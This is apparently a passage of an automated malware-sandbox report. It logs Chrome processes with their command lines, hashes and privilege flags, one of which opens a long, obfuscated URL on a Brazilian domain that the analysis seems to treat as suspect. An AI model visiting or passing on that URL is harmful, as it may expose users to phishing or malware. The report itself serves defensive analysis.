                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:2
                                                              Start time:03:40:26
                                                              Start date:03/07/2024
                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                              Imagebase:0x7ff684c40000
                                                              File size:3'242'272 bytes
                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:3
                                                              Start time:03:40:28
                                                              Start date:03/07/2024
                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT"
                                                              Imagebase:0x7ff684c40000
                                                              File size:3'242'272 bytes
                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              No disassembly